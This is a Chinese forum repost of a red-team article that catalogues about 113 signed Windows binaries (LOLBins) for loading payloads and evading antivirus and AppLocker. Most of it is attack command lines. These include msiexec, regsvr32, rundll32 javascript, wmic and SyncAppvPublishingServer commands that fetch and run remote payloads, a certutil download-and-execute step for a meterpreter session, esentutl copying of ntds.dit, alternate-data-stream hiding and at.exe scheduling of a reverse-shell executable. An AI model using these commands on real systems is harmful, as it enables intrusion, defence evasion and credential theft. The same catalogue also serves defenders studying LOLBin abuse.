本帖最后由 gclome 于 2020-5-11 23:10 编辑
原文链接:远控免杀专题(67)-白名单(113个)总结篇
关于白名单程序相信大家对白名单程序利用的手法也已经非常熟悉了,白名单程序利用其实是起源于LOLBins,全称“Living-Off-the-Land Binaries”,直白翻译为“生活在陆地上的二进制“,这个概念最初在2013年DerbyCon黑客大会由Christopher Campbell和Matt Graeber进行创造,最终Philip Goh提出了LOLBins这个概念。 什么程序才能称之为LOLBins: 本系列文章从专题34到专题63,共介绍了33个常见的白名单程序,分别为:Rundll32.exe、Msiexec.exe、MSBuild.exe、InstallUtil.exe、Mshta.exe、Regsvr32.exe、Cmstp.exe、CScript.exe、WScript.exe、Forfiles.exe、te.exe、Odbcconf.exe、InfDefaultInstall.exe、Diskshadow.exe、PsExec.exe、Msdeploy.exe、Winword.exe、Regasm.exe、Regsvcs.exe、Ftp.exe、pubprn.vbs、winrm.vbs、slmgr.vbs、Xwizard.exe、Compiler.exe、IEExec.exe、MavInject32、Presentationhost.exe、Wmic.exe、Pcalua.exe、Url.dll、zipfldr.dll、Syncappvpublishingserver.vbs。 其实还有大量的LOLBins程序可以被利用,只是有些利用条件比较苛刻,有些是用来下载而不是用来执行payload的,我从https://lolbas-project.github.io等其他站点共搜集到113个,除了之前介绍的33个外,还有另外的80个白利用程序也在这做简要介绍。 由于白名单程序加载payload的免杀测试需要杀软的行为检测才合理,静态查杀payload或者查杀白名单程序都没有任何意义,所以这里对白名单程序的免杀效果不做评判。 免杀系列文章及相关软件下载:https://github.com/TideSec/BypassAntiVirus 本文内容摘要1、执行命令类(已测试33个) 这是从众多白名单程序里搜集了一些知名度比较高也比较通用一些的白名单进行了逐一测试,这些程序的具体介绍已经在"Tide安全团队"公众号上发布,这是只是简单罗列一下。 2、其他MS windows程序(45个) 这些也都是windows自带的可执行程序,有的利用起来条件稍微苛刻,感兴趣的可以逐一测试。 3、系统库文件(10个) windows自带的dll文件,一般需要使用rundll32来加载执行。 4、其他MS程序(21个) 并非windows自带,但属于微软配套的用的较多的软件,比如office、donet、visual studio等程序安装后引入的程序。 5、脚本文件(4个) windows自带的脚本文件,可用来加载payload。 执行命令类(已测试33个)在本免杀专题34到专题63(已发布在我们团队的公众号"Tide安全团队"上),共搜集了33个常见的白名单程序,并一一进行了分析和详细测试,本部分也是对这些已进行了测试的白名单程序进行简要汇总,详细测试过程可参考相应文章链接。 MSBuild.exeMicrosoft Build Engine是一个用于构建应用程序的平台,此引擎也被称为msbuild,它为项目文件提供一个XML模式,该模式控制构建平台如何处理和构建软件。Visual Studio使用MSBuild,但它不依赖于Visual Studio。通过在项目或解决方案文件中调用msbuild.exe,可以在未安装Visual Studio的环境中编译和生成程序。 msbuild.exe加载文件的方式有两种 - 1. 本地加载执行:
- - %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe <folder_path_here>\msbuild_nps.xml
- 2. 远程文件执行:
- wmiexec.py <USER>:'<PASS>'@<RHOST> cmd.exe /c start %windir%\Microsoft.NET\Framework\v4.0.30319\msbuild.exe \\<attackerip>\<share>\msbuild_nps.xml
复制代码 Msiexec.exe看到msiexec可能还有点陌生,但说道.msi可能就比较熟悉了,在windows下很多软件安装就是.msi格式的。当Windows操作系统安装了Windows Installer引擎,而MSI软件包使用该引擎来 安装应用程序,解释包和安装产品的可执行程序就是我们这用到 的Msiexec.exe。 msi文件可以双击执行,也可以命令行静默执行,而且msiexec也同样支持远程下载功能,将msi文件上传到服务器,通过如下命令远程执行: - msiexec /q /i http://www.tidesec.com/shell/shell.msi
复制代码 InstallUtil.exeInstallUtil.exe算是免杀白名单里使用比较多的一个了,InstallUtil.exe可以用于安装有.NET开发的所有应用安装程序,如果要使用 .NET Framework 开发 Windows 服务,则可以使用installutil.exe命令行快速安装服务应用程序。 metasploit自带的evasion免杀模块,就提供了windows/applocker_evasion_install_util来直接创建InstallUtil.exe可加载的payload,详见远控免杀专题文章(4)-Evasion模块免杀(VT免杀率12/71):https://mp.weixin.qq.com/s/YnnCM7W20xScv52k_ubxYQ 另外,专题20里的GreatSCT也提供了基于InstallUtil.exe的免杀:https://mp.weixin.qq.com/s/s9DFRIgpvpE-_MneO0B_FQ 使用csc编译InstallUtil-ShellCode.cs - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe /unsafe /platform:x86 /out:C:\test\shell.exe C:\test\InstallUtil-ShellCode.cs
复制代码 使用InstallUtil.exe执行shell.exe
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\InstallUtil.exe /logfile= /LogToConsole=false /U C:\test\shell.exe
复制代码 Mshta.exeMshta.exe是微软Windows操作系统相关程序,英文全称Microsoft HTML Application,可翻译为微软超文本标记语言应用,用于执行.HTA文件。 路径: - C:\Windows\System32\mshta.exe
- C:\Windows\SysWOW64\mshta.exe
复制代码
执行hta Rundll32.exeRundll32.exe,可以执行32位的DLL文件,以命令行的方式调用动态链接程序库。。它的作用是执行DLL文件中的内部函数,这样在进程当中,只会有Rundll32.exe,而不会有DLL后门的进程,这样就实现了进程上的隐藏。系统中还有一个Rundll.exe文件,可以执行16位的DLL文件。 Rundll32.exe令行下的使用方法为:Rundll32.exe DLLname,Functionname,需注意x86,x64位的Rundll32调用,64位的系统默认调用的是64位Rundll32.exe(在C:\Windows\System32目录下)。 Windows 7 默认位置: - 64位 C:\Windows\System32\rundll32.exe
- 32位 C:\Windows\SysWOW64\rundll32.exe
复制代码Rundll32的使用,参考自ATT&CK手册。 1)直接执行dll文件 - rundll32.exe c:\\windows\\debug\\item.dat,ServiceMain aaaa
- rundll32.exe "C:\Windows\twain_64.dll",EntryPoint
复制代码2)调用系统中原生存在的dll中的未记录dll函数 2.1)调用shell32.dll函数执行控制面板项文件(.cpl) - rundll32 shell32.dll,Control_RunDLL <文件名>
- control.exe test.cpl
复制代码2.2)Advpack.dll - LaunchINFSection advpack.dll用于帮助硬件和软件读取和验证·INF文件。正如老话所说,”大部分安全问题本质就是功能被误用“,advpack.dll也可以被攻击者利用进行代码/指令代理执行, - rundll32.exe advpack.dll,LaunchINFSection c:\test.inf,DefaultInstall_SingleUser,1,
- C:\\Windows\\System32\\rundll32 advpack.dll,LaunchINFSectionEx C:\\Windows\\system32\\ieuinit.inf,Install
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
复制代码 2.3)Advpack.dll - RegisterOCX
- rundll32.exe advpack.dll,RegisterOCX calc.exe
- Requires admin: No
- Windows binary: Yes
- Bypasses AppLocker Default rules: Yes
复制代码 2.4)zipfldr.dll - RouteTheCall
- rundll32.exe zipfldr.dll,RouteTheCall calc.exe
复制代码 2.5)url.dll - OpenURL
- rundll32 url.dll,OpenURL file://C:/Windows/system32/calc.exe
- rundll32.exe url.dll,OpenURL "C:\test\calc.hta"
- rundll32.exe url.dll,OpenURL "C:\test\calc.url"
- rundll32.exe url.dll,OpenURL http://192.168.1.4/Micropoor_url_dll.hta
复制代码 2.6)url.dll - FileProtocolHandler
- rundll32.exe url.dll, FileProtocolHandler calc.exe
复制代码 2.7)ieframe.dll - OpenURL
- rundll32.exe ieframe.dll,OpenURL "C:\test\calc.url"
复制代码 2.8)shdocvw.dll - OpenURL
- rundll32.exe shdocvw.dll,OpenURL "C:\test\calc.url"
复制代码 2.9)ieadvpack.dll - LaunchINFSection
- rundll32.exe ieadvpack.dll,LaunchINFSection test.inf,,1,
复制代码 2.10)shell32.dll - ShellExec_RunDLL
- rundll32.exe shell32.dll,ShellExec_RunDLL
- C:\Windows\System32\calc.exe
复制代码 2.11)pcwutl.dll - LaunchApplication
- rundll32.exe C:\Windows\System32\pcwutl.dll,LaunchApplication calc.exe
复制代码 2.12)Setupapi.dll - InstallHinfSection
- # Launch an executable file via the InstallHinfSection function and .inf file section directive.
- rundll32.exe setupapi.dll,InstallHinfSection DefaultInstall 128 C:\\Tools\\calc_exe.inf
复制代码 2.13)Syssetup.dll - SetupInfObjectInstallAction
- # Launch an executable file via the SetupInfObjectInstallAction function and .inf file section directive.
- rundll32 syssetup.dll,SetupInfObjectInstallAction DefaultInstall 128 c:\temp\something.inf
复制代码 3)执行javascript脚本
- rundll32 javascript:"\..\mshtml,RunHTMLApplication";o=GetObject("script:http://reverse-tcp.xyz/payload.sct");window.close();
- rundll32.exe javascript:"\..\mshtml.dll,RunHTMLApplication ";eval("w=new%20ActiveXObject("WScript.Shell");w.run("calc");window.close()");
- rundll32.exe javascript:"\..\mshtml,RunHTMLApplication ";document.write();h=new%20ActiveXObject("WScript.Shell").run("calc.exe",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new%20ActiveXObject("WScript.Shell").Run("cmd /c taskkill /f /im rundll32.exe",0,true);}
复制代码 Regsvr32.exeRegsvr32是一个命令行实用程序,用于注册和取消注册OLE控件,例如Windows注册表中的DLL和ActiveX控件,以命令行方式运行。Regsvr32.exe安装在Windows XP及更高版本的Windows的%systemroot%\System32 文件夹中。当通过regsvr32中注册一个dll文件时,有关与regsvr32关联的程序的信息将会被添加到Windows中,然后访问这些进程查看器以了解程序数据的位置以及如何与程序数据进行交互。在注册一个dll文件时,会将信息添加到目录中,以便Windows可以使用它。通常,除了注册和注销dll文件外,此文件不常用。 Regsvr32.exe分32位和64位,在windows系统中的位置 - 64位:C:\WINDOWS\SysWOW64\regsvr32.exe
- 32位:C:\WINDOWS\system32\regsvr32.exe
复制代码
执行本地脚本 - regsvr32.exe /s /u /i:file.sct scrobj.dll
复制代码 加载远程脚本执行
- regsvr32.exe /s /u /i:http://reverse-tcp.xyz/file.sct scrobj.dll
- regsvr32.exe /u /n /s /i:\\webdavserver\folder\payload.sct scrobj.dll
复制代码 Cmstp.exeMicrosoft连接管理器配置文件安装程序(CMSTP.exe)是用于安装连接管理器服务配置文件的命令行程序。CMSTP.exe接受安装信息文件(INF)作为参数,并安装用于远程访问连接的服务配置文件。 攻击者可能会使用CMSTP.exe调用恶意的INF文件。与Regsvr32 相似,CMSTP.exe可能被利用从远程服务器加载和执行DLL或COM脚本(SCT)。由于CMSTP.exe是合法的,经过签名的Microsoft应用程序,因此该执行过程也可以绕过AppLocker和其他白名单防御。 在windows中文件路径 - 64位 C:\Windows\System32\cmstp.exe
- 32位 C:\Windows\SysWOW64\cmstp.exe
复制代码执行本地payload:cmstp.exe /ni /s c:\cmstp\CorpVPN.inf 执行远程payload:cmstp.exe /ni /s \\10.211.55.28\test\cmstp.inf Ftp.exeFtp.exe是Windows本身自带的一个程序,属于微软FTP工具,提供基本的FTP访问。 Windows 2003 默认位置: - C:\Windows\System32\ftp.exe
- C:\Windows\SysWOW64\ftp.exe
复制代码 Windows 7 默认位置:
- C:\Windows\System32\ftp.exe
- C:\Windows\SysWOW64\ftp.exe
复制代码 执行方式:
- echo !calc.exe > ftpcommands.txt && ftp -s:ftpcommands.txt
复制代码
Regasm.exe/Regsvcs.exeRegsvcs和Regasm是Windows命令行实用程序,用于注册.NET组件对象模型(COM)程序集。两者都是由Microsoft进行数字签名的。攻击者可以使用Regsvcs和Regasm代理通过受信任的Windows实用程序执行代码。两个实用程序可用于通过使用二进制内的属性来绕过进程白名单,以指定应在注册或取消注册之前运行的代码:[ComRegisterFunction]或[ComUnregisterFunction]分别。即使进程在权限不足的情况下运行并且无法执行,也将执行具有注册和取消注册属性的代码。 - regasm.exe AllTheThingsx64.dll
- regsvcs.exe AllTheThingsx64.dll
复制代码 Compiler.exeMicrosoft.Workflow.Comiler.exe是.NET Framework默认自带的一个实用工具,用户能够以XOML工作流文件的形式提供一个序列化工作流来执行任意未签名的代码。 注意:如果Microsoft.Workflow.Compiler命令无法识别,可能是Microsoft.Workflow.Compiler.exe所在路径没有被系统添加PATH环境变量中。 Win7的Compiler.exe默认位置: - C:\Windows\Microsoft.NET\Framework\v4.0.30319\Microsoft.Workflow.Compiler.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Microsoft.Workflow.Compiler.exe
复制代码 执行方式:- Microsoft.Workflow.Compiler.exe tests.xml results.xml
复制代码 MavInject.exeMavInject32.exe是微软应用程序虚拟化的一部分,可以直接完成向某一进程注入代码的功能。 64位系统下的文件位置:C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe
- C:\Program Files\Common Files\microsoft shared\ClickToRun\MavInject32.exe" <PID> /INJECTRUNNING <PATH DLL>
复制代码 presentationhost.exePresentationhost.exe是一个内置的Windows可执行文件,用于运行XAML浏览器应用程序(即.xbap文件)。在多个AppLocker白名单绕过列表中,Presentationhost.exe都位列其中(例如api0cradl和milkdevil)。 当我们打开.xbap文件的时候其实不是在IE中启动的应用程序,而是在Presentationhost.exe中运行,通常是在一个沙箱中以保护用户免受恶意代码的攻击。 执行方式: - Presentationhost.exe C:\temp\Evil.xbap
复制代码
IEexec.exeIEexec.exe应用程序是.NET Framework附带程序,存在于多个系统白名单内。可以将IEExec.exe应用程序用作主机,以运行使用URL启动的其他托管应用程序。 IEexe.exe在64位系统路径为:C:\Windows\Microsoft.NET\Framework64\v2.0.50727
执行方式: - ieexec.exe http://x.x.x.x:8080/bypass.exe
复制代码 winrm.vbs/slmgr.vbswinrm.vbs(System32中的Windows签名脚本)能够使用和执行攻击者控制的XSL,而XSL不受“enlightened script host”的限制,导致任意的、无签名的代码执行。 winrm.vbs文件位置: - C:\windows\system32\winrm.vbs
- C:\windows\SysWOW64\winrm.vbs
复制代码 执行方式:
- cscript /b C:\Windows\System32\slmgr.vbs
- winrm quickconfig
复制代码 pubprn.vbs在Windows 7+上,存在一个Microsoft签名的WSH脚本,名为PubPrn.vbs,该脚本位于“ C:\ Windows \ System32 \ Printing_Admin_Scripts \ en-US中。在查看此特定脚本时,很明显它正在接受用户提供的输入(通过命令行参数)并将参数传递给“GetObject()。 文件位置:C:\Windows\System32\Printing_Admin_Scripts\en-US\pubprn.vbs
执行方式: - C:\Windows\System32\Printing_Admin_Scripts\zh-CN\pubprn.vbs 127.0.0.1 script:http://10.211.55.5/msf.sct
复制代码 Xwizard.exexwizard.exe应该为Extensible wizard的缩写,中文翻译可扩展的向导主机进程,暂时无法获得官方资料。 利用xwizard.exe加载dll可以绕过应用程序白名单限制,该方法最大的特点是xwizard.exe自带微软签名,在某种程度上说,能够绕过应用程序白名单的拦截。 xwizard.exe支持Win7及以上操作系统,位于%windir%\system32\下。 对应64位系统:
winword.exewinword.exe是微软Microsoft Word的主程序。该字处理程序是微软Microsoft Office组件的一部分。 - 执行方式
- winword.exe "http://192.168.19.146/shell.dll"
复制代码
msdeloy.exemsdeploy.exe是微软提供的web部署命令行工具,通过它可以方便的部署web应用、数据库等,路径在C:\Program Files\IIS\Microsoft Web Deploy V3。msdeloy.exe可以使IIS可以在本地或远程同步,打包和部署Web应用程序,网站或Web服务器内容和配置。它具有众多功能,这些功能可以高度精确地包括要处理的那些组件,并排除那些不需要的组件。为了能够使用Web Deploy,必须已在源计算机和目标计算机上安装IIS。 - 执行方式:
- msdeploy.exe -verb:sync -source:RunCommand -dest:Runcommand="C:\Program Files\IIS\Microsoft Web Deploy V3\w_re.exe"
复制代码
psexec.exePsExec是SysinternalsSuite的小工具之一,是一种轻量级的telnet替代品,允许在其他系统上执行进程,完成控制台应用程序的完全交互,而无需手动安装客户端软件,并且可以获得与控制台应用程序相当的完全交互性。在windows系统并未默认安装,下载地址见参考文章。 psexec执行payload: - psexec.exe -s -d msiexec /q /i http://yourservice/shell/win_re.txt
- //-s 以system权限执行
- // -d 不产生交互式窗口
复制代码 WMIC.exeWMIC扩展WMI(Windows Management Instrumentation,Windows管理工具),提供了从命令行接口和批命令脚本执行系统管理的支持。在WMIC出现之前,如果要管理WMI系统,必须使用一些专门的WMI应用,例如SMS,或者使用WMI的脚本编程API,或者使用象CIM Studio之类的工具。如果不熟悉C++之类的编程语言或VBScript之类的脚本语言,或者不掌握WMI名称空间的基本知识,要用WMI管理系统是很困难的。WMIC改变了这种情况。 Windows 2003 默认位置:
- C:\WINDOWS\system32\wbem\wmic.exe C:\WINDOWS\SysWOW64\wbem\wmic.exe
复制代码 Windows 7 默认位置:
- C:\Windows\System32\wbem\WMIC.exe C:\Windows\SysWOW64\wbem\WMIC.exe
复制代码 执行方式:
- wmic os get /FORMAT:"http://10.211.55.10/payload.xsl"
复制代码 SyncAppvPublishingServer.vbsWindows上有两个版本的SyncAppVPublishingServer工具,它们是:SyncAppvPublishingServer.exe、SyncAppvPublishingServer.vbs,可以用他们来取代powershell。 在powershell下执行
- SyncAppvPublishingServer.vbs "n;((New-Object Net.WebClient).DownloadString('http://some.url/script.ps1') | IEX"
复制代码 Pcalua.exePcalua是Windows进程兼容性助理(Program Compatibility Assistant)的一个组件。 默认在C:\Windows\System32\pcalua.exe
zipfldr.dllzipfldr.dll自Windows xp开始自带的zip文件压缩/解压工具组件。 说明:zipfldr.dll所在路径已被系统添加PATH环境变量中,因此,zipfldr.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。Windows 2003 默认位置:
- C:\Windows\System32\zipfldr.dll
- C:\Windows\SysWOW64\zipfldr.dll
复制代码 Windows 7 默认位置:
- C:\Windows\System32\zipfldr.dll
- C:\Windows\SysWOW64\zipfldr.dll
复制代码 执行方式:
- rundll32.exe zipfldr.dll,RouteTheCall msf.exe
复制代码 Url.dllurl.dll是Internet快捷壳扩展相关应用程序接口系统文件。url.dll所在路径已被系统添加PATH环境变量中,因此,url.dll命令可识别,但由于为dll文件,需调用rundll32.exe来执行。 Windows 2003 默认位置:
- C:\Windows\System32\url.dll
- C:\Windows\SysWOW64\url.dll
复制代码 Windows 7 默认位置:
- C:\Windows\System32\url.dll
- C:\Windows\SysWOW64\url.dll
复制代码 执行方式:
- rundll32.exe url.dll, OpenURL file://c:\windows\system32\calc.exe
- rundll32.exe url.dll, OpenURLA file://c:\windows\system32\calc.exe
- rundll32.exe url.dll, FileProtocolHandler calc.exe
复制代码 DiskShadow.exediskshadow.exe是一种工具,可公开卷影复制服务(VSS)提供的功能。默认情况下,diskshadow使用类似于diskraid或DiskPart的交互式命令解释器。diskshadow还包括可编写脚本的模式。(详见微软官方文档https://docs.microsoft.com/en-us ... commands/diskshadow)
- diskshadow.exe /s c:\test\diskshadow.txt
复制代码 Odbcconf.exeOdbcconf.exe是一个命令行工具,可让您配置ODBC驱动程序和数据源名称(微软官方文档https://docs.microsoft.com/en-us ... ew=sql-server-ver15)。 Odbcconf.exe在windows中的的一般路径为C:\Windows\System32\odbcconf.exe C:\Windows\SysWOW64\odbcconf.exe
- odbcconf.exe /a {regsvr C:\Users\Administrator\Desktop\hacker.dll}
复制代码 Forfiles.exeForfiles是一款windows平台默认安装的文件操作搜索工具之一,可以通过文件名称,修改日期等条件选择文件并运行一个命令来操作文件。它可以直接在命令行中使用,也可以在批处理文件或其他脚本中使用。 默认安装位置:
- C:\WINDOWS\system32\forfiles.exe
- C:\WINDOWS\SysWOW64\forfiles.exe
复制代码说明:Forfiles.exe所在路径已被系统添加PATH环境变量中,因此,Forfiles命令可识别,需注意x86,x64位的Forfiles调用。
- forfiles /p c:\windows\system32 /m cmd.exe /c "msiexec.exe /q /i C:\Users\administrator\Desktop\TIDE.txt"
复制代码 Te.exe如果安装了TAEF(Test Authoring and Execution Framework)框架并且位于列入白名单的路径中,则可以使用它,需要在计算机上安装Visual Studio和WDK。 微软官方文档:https://docs.microsoft.com/en-us/windows-hardware/drivers/taef/ 默认安装位置: - C:\ program files(x86)\Windows Kits\10\testing\Runtimes\TAEF
复制代码使用脚本语言编写测试,Windows仅支持JScript和VBScript。
CScript.exe/WScript.exe系统文件cscript.exe是存放在Windows系统文件夹中的重要文件,通常情况下是在安装操作系统过程中自动创建的,对于系统正常运行来说至关重要,Windows Script Host引擎在cscript.exe来寻找和连接脚本的运行库,最常见的有VBScript和JavaScript。 wscript全称“Windows Scripting Host”,是一种批次语言/自动执行工具——它所对应的程序“wscript.exe”是一个脚本语言解释器,位于C:\WINDOWS\system32目录下,正是它才使得脚本可以被执行,就象执行批处理一样,可以拿来执行.wsh,.vbs,.js等。 WScript是一个窗口化的版本;CScript是一个命令行的版本。两种版本都可以运行任何脚本。二者之间的区别是,窗口化版本(WScript)使用一个弹出对话框来显示文本输出消息,而命令行版本(CSCript)通过命令行程序所见的、常规的“标准输出”方法来显示文本。 CScript/WScript可以用来执行vbs和js等脚本,是否能达到免杀的目的取决于执行的脚本本身的免杀能力。 使用cscript.exe执行生成的vbs脚本。
使用WScript.exe执行vbs反弹脚本,和cscript.exe相比命令行中没有文本输出信息。
InfDefaultInstall.exeInfDefaultInstall.exe是一个用来进行inf安装的工具,具有微软签名,存在路径为:
- C:\Windows\System32\Infdefaultinstall.exe
- C:\Windows\SysWOW64\Infdefaultinstall.exe
复制代码 执行方式:
- InfDefaultInstall.exe "C:\xxx\shady.inf"
复制代码
其他MS windows程序(45个)At.exewindows计划任务程序。 文件路径: - C:\WINDOWS\System32\At.exe
- C:\WINDOWS\SysWOW64\At.exe
复制代码 执行方式:
- C:\Windows\System32\at.exe at 09:00 /interactive /every:m,t,w,th,f,s,su C:\Windows\System32\revshell.exe
复制代码 参考资料:
- https://freddiebarrsmith.com/at.txt
- https://sushant747.gitbooks.io/total-oscp-guide/privilege_escalation_windows.html - Escalate to System from Administrator
- https://www.secureworks.com/blog/where-you-at-indicators-of-lateral-movement-using-at-exe-on-windows-7-systems
复制代码 Atbroker.exewindows辅助技术AT程序。 文件路径:
- C:\Windows\System32\Atbroker.exe
- C:\Windows\SysWOW64\Atbroker.exe
复制代码 执行方式:
- ATBroker.exe /start malware
复制代码 参考资料:
- http://www.hexacorn.com/blog/2016/07/22/beyond-good-ol-run-key-part-42/
复制代码
Bash.exe- 使用说明:Windows子系统用于Linux的文件
文件路径: - C:\Windows\System32\bash.exe
- C:\Windows\SysWOW64\bash.exe
复制代码 执行方式:
参考资料:
- https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
复制代码 Bitsadmin.exe文件路径: - C:\Windows\System32\bitsadmin.exe
- C:\Windows\SysWOW64\bitsadmin.exe
复制代码 执行方式
- bitsadmin /create 1 & bitsadmin /addfile 1 c:\windows\system32\cmd.exe c:\data\playfolder\cmd.exe & bitsadmin /SetNotifyCmdLine 1 c:\data\playfolder\cmd.exe NULL & bitsadmin /RESUME 1 & bitsadmin /Reset
复制代码 下载文件
- bitsadmin /create 1 bitsadmin /addfile 1 https://live.sysinternals.com/autoruns.exe c:\data\playfolder\autoruns.exe bitsadmin /RESUME 1 bitsadmin /complete 1
复制代码 参考资料:
- https://www.slideshare.net/chrisgates/windows-attacks-at-is-the-new-black-26672679 - slide 53
- https://www.youtube.com/watch?v=_8xJaaQlpBo
- https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
复制代码 Certutil.exeCertutil.exe是一个命令行程序,作为证书服务的一部分安装。我们可以使用此工具在目标计算机上执行我们的恶意exe文件以获取meterpreter会话。 文件路径:
- C:\Windows\System32\certutil.exe
- C:\Windows\SysWOW64\certutil.exe
复制代码 执行方式:
- certutil -urlcache -split -f http://x.x.x.x/msf a.exe && a.exe
- certutil.exe -urlcache -split -f http://x.x.x.x/x.jar &&java -jar x.jar
- certutil.exe -verifyctl -f -split http://7-zip.org/a/7z1604-x64.exe 7zip.exe
- certutil -encode inputFileName encodedOutputFileName
- certutil -decode encodedInputFileName decodedOutputFileName
复制代码 参考资料:
- https://twitter.com/Moriarty_Meng/status/984380793383370752
- https://twitter.com/mattifestation/status/620107926288515072
- https://twitter.com/egre55/status/1087685529016193025
复制代码 Cmd.exewindows命令行程序。 文件路径: - C:\Windows\System32\cmd.exe
- C:\Windows\SysWOW64\cmd.exe
复制代码 执行方式:
- cmd.exe /c echo regsvr32.exe ^/s ^/u ^/i:https://raw.githubusercontent.com/redcanaryco/atomic-red-team/master/atomics/T1117/RegSvr32.sct ^scrobj.dll > fakefile.doc:payload.bat
- cmd.exe - < fakefile.doc:payload.bat
复制代码 参考资料:
- https://twitter.com/yeyint_mth/status/1143824979139579904
复制代码 Cmdkey.exe- 使用说明:创建、列出和删除存储的用户名以及密码或凭据。
文件路径:
- C:\Windows\System32\cmdkey.exe
- C:\Windows\SysWOW64\cmdkey.exe
复制代码 执行方式:
参考资料:
- https://www.peew.pw/blog/2017/11/26/exploring-cmdkey-an-edge-case-for-privilege-escalation
- https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/cmdkey
复制代码 Control.exe用于在Windows中启动控制面板项目的程序。 文件路径:
- C:\Windows\System32\control.exe
- C:\Windows\SysWOW64\control.exe
复制代码 执行方式:
- control.exe c:\windows\tasks\file.txt:evil.dll
复制代码 参考资料:
- https://pentestlab.blog/2017/05/24/applocker-bypass-control-panel/
- https://www.contextis.com/resources/blog/applocker-bypass-registry-key-manipulation/
- https://twitter.com/bohops/status/955659561008017409
- https://docs.microsoft.com/en-us/windows/desktop/shell/executing-control-panel-items
- https://bohops.com/2018/01/23/loading-alternate-data-stream-ads-dll-cpl-binaries-to-bypass-applocker/
复制代码 Csc.exe.NET可以使用csc程序来编译C#代码。 文件路径:
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Csc.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Csc.exe
复制代码 执行方式
- csc.exe -out:My.exe File.cs
- csc -target:library File.cs
复制代码 参考资料
- https://docs.microsoft.com/en-us/dotnet/csharp/language-reference/compiler-options/command-line-building-with-csc-exe
复制代码 Dfsvc.exedfsvc.exe是用来检查应用程序是否已经安装并且是最新的,如果需要的话将应用程序下载到用户AppData中的ClickOnce文件夹,然后从当前位置(随着每次更新而改变)启动它。 文件路径:
- C:\Windows\Microsoft.NET\Framework\v2.0.50727\Dfsvc.exe
- C:\Windows\Microsoft.NET\Framework64\v2.0.50727\Dfsvc.exe
- C:\Windows\Microsoft.NET\Framework\v4.0.30319\Dfsvc.exe
- C:\Windows\Microsoft.NET\Framework64\v4.0.30319\Dfsvc.exe
复制代码 执行方式:
- rundll32.exe dfshim.dll,ShOpenVerbApplication http://www.domain.com/application/?param1=foo
复制代码 参考资料:
- https://github.com/api0cradle/ShmooCon-2015/blob/master/ShmooCon-2015-Simple-WLEvasion.pdf
- https://stackoverflow.com/questions/13312273/clickonce-runtime-dfsvc-exe
复制代码 Dnscmd.exe用于管理DNS服务器的命令行界面 文件路径: - C:\Windows\System32\Dnscmd.exe
- C:\Windows\SysWOW64\Dnscmd.exe
复制代码 执行方式:
- dnscmd.exe dc1.lab.int /config /serverlevelplugindll \\192.168.0.149\dll\wtf.dll
复制代码 参考资料:
- https://medium.com/@esnesenon/feature-not-bug-dnsadmin-to-dc-compromise-in-one-line-a0f779b8dc83
- https://blog.3or.de/hunting-dns-server-level-plugin-dll-injection.html
- https://github.com/dim0x69/dns-exe-persistance/tree/master/dns-plugindll-vcpp
- https://twitter.com/Hexacorn/status/994000792628719618
- http://www.labofapenetrationtester.com/2017/05/abusing-dnsadmins-privilege-for-escalation-in-active-directory.html
复制代码 Esentutl.exe用于处理Microsoft联合引擎技术(JET)数据库的二进制文件 文件路径:
- C:\Windows\System32\esentutl.exe
- C:\Windows\SysWOW64\esentutl.exe
复制代码 执行方式:
- esentutl.exe /y C:\folder\sourcefile.vbs /d C:\folder\destfile.vbs /o
- esentutl.exe /y /vss c:\windows\ntds\ntds.dit /d c:\folder\ntds.dit
- esentutl.exe /y C:\ADS\file.exe /d c:\ADS\file.txt:file.exe /o
- esentutl.exe /y C:\ADS\file.txt:file.exe /d c:\ADS\file.exe /o
- esentutl.exe /y \\192.168.100.100\webdav\file.exe /d c:\ADS\file.txt:file.exe /o
- esentutl.exe /y \\live.sysinternals.com\tools\adrestore.exe /d \\otherwebdavserver\webdav\adrestore.exe /o
复制代码 参考资料:
- https://twitter.com/egre55/status/985994639202283520
- https://dfironthemountain.wordpress.com/2018/12/06/locked-file-access-using-esentutl-exe/
- https://twitter.com/bohops/status/1094810861095534592
复制代码 Eventvwr.exe在GUI窗口中显示Windows事件日志。 文件路径:
- C:\Windows\System32\eventvwr.exe
- C:\Windows\SysWOW64\eventvwr.exe
复制代码 执行方式:
参考资料
- https://enigma0x3.net/2016/08/15/fileless-uac-bypass-using-eventvwr-exe-and-registry-hijacking/
- https://github.com/enigma0x3/Misc-PowerShell-Stuff/blob/master/Invoke-EventVwrBypass.ps1
复制代码 Expand.exeexpand.exe是一个可执行文件,属于Microsoft Corporation开发的User Profile Hive Cleanup Service程序的一部分。用于扩展对文件压缩的功能。 文件路径:
- C:\Windows\System32\Expand.exe
- C:\Windows\SysWOW64\Expand.exe
复制代码
执行方式:
- expand \\webdav\folder\file.bat c:\ADS\file.bat
- expand c:\ADS\file1.bat c:\ADS\file2.bat
- expand \\webdav\folder\file.bat c:\ADS\file.txt:file.bat
复制代码
参考资料:
- https://twitter.com/infosecn1nja/status/986628482858807297
- https://twitter.com/Oddvarmoe/status/986709068759949319
复制代码
Extexport.exe- 使用说明:ExtExport.exe是可执行文件,属于Microsoft Corporation开发的Internet Explorer程序的一部分。
文件路径:
- C:\Program Files\Internet Explorer\Extexport.exe
- C:\Program Files (x86)\Internet Explorer\Extexport.exe
复制代码 执行方式:
- Extexport.exe c:\test foo bar
复制代码 参考资料:
- http://www.hexacorn.com/blog/2018/04/24/extexport-yet-another-lolbin/
复制代码 Extrac32.exe
- 使用说明:extrac32.exe是属于Microsoft®CAB File Extract Utility的进程。
文件路径:
- C:\Windows\System32\extrac32.exe
- C:\Windows\SysWOW64\extrac32.exe
复制代码 执行方式:
- extrac32 C:\ADS\procexp.cab c:\ADS\file.txt:procexp.exe
- extrac32 \\webdavserver\webdav\file.cab c:\ADS\file.txt:file.exe
- extrac32 /Y /C \\webdavserver\share\test.txt C:\folder\test.txt
复制代码 参考资料:
